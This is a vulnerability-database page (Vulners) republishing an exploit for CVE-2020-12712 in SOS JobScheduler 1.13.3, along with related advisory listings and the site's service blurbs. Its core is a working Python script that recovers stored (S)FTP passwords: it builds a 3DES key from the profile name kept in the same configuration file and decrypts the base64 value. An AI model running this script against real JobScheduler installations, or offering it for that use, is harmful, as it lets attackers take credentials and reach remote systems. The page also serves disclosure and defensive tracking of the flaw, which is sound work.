Vulners
Lucene search
SOS JobScheduler 1.13.3 - Stored Password Decryption
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Gila CMS 1.11.8 CVE-2020-5515 - SQL Injection | 18 Jun 202001:32 | – | 0daydb |
| Linux/ARM 0.0.0.0:1337/TCP Bindshell Shellcode | 18 Jun 202001:28 | – | 0daydb |
| SOS JobScheduler 1.13.3 CVE-2020-12712 Stored Password Decryption | 18 Jun 202001:30 | – | 0daydb |
 | SOS JobScheduler 1.13.3 - Stored Password Decryption Exploit | 16 Jun 202000:00 | – | zdt |
 | Unspecified Vulnerability in Software- und Organisations-Service SOS JobScheduler | 12 Jun 202000:00 | – | cnvd |
 | CVE-2020-12712 | 11 Jun 202013:18 | – | cve |
 | CVE-2020-12712 | 11 Jun 202013:18 | – | cvelist |
 | EUVD-2020-5000 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-12712 | 11 Jun 202014:15 | – | nvd |
 | CVE-2020-12712 | 11 Jun 202014:15 | – | osv |
10
# Exploit Title: SOS JobScheduler 1.13.3 - Stored Password Decryption
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: Sander Ubink
# Vendor Homepage: www.sos-berlin.com
# Software Link: www.sos-berlin.com/en/jobscheduler-downloads
# Version: Tested on 1.12.9 and 1.13.3, vendor reported 1.12 and 1.13
# Tested on: Windows and Linux
# CVE: CVE-2020-12712
# Description: SOS JobScheduler is a tool for remote system administration that allows users to call maintenance scripts via a web interface.
# The tool places the maintenance scripts on the remote systems by means of (S)FTP. It allows the user to save profiles for these connections,
# in which the password for the (S)FTP connection is optionally stored. When the user chooses to store the password with the profile,
# it is encrypted using the name of the profile as the encryption key. Since the name of the profile is stored in the same configuration file,
# the plaintext (S)FTP password can trivially be recovered. The encryption algorithm used is Triple DES (3DES) with three keys, requiring a key
# length of 24 bytes. The profile name is padded to this length to create the key. Finally, the encrypted password gets base64 encoded before
# being stored in the configuration file.
# Usage: python jobscheduler-decrypt.py [encrypted password in base64] [profile name]
import pyDes
import base64
import argparse
parser = argparse.ArgumentParser(description="Decrypt the password stored in a Jobscheduler (S)FTP profile configuration file")
parser.add_argument("password", help="password to be decrypted")
parser.add_argument("profilename", help="name of the profile")
args = parser.parse_args()
if len(args.profilename) > 24:
sys.exit("Profile name is longer than 24 characters. Check the validity of the input.")
key = args.profilename + ((24 - len(args.profilename)) * " ")
cipher = pyDes.triple_des(key, pyDes.ECB, b"\0\0\0\0\0\0\0\0", pad=" ", padmode=None)
plain = cipher.decrypt(base64.b64decode(args.password))
print(plain)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2020 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
CVSS 3.17.5
EPSS0.07842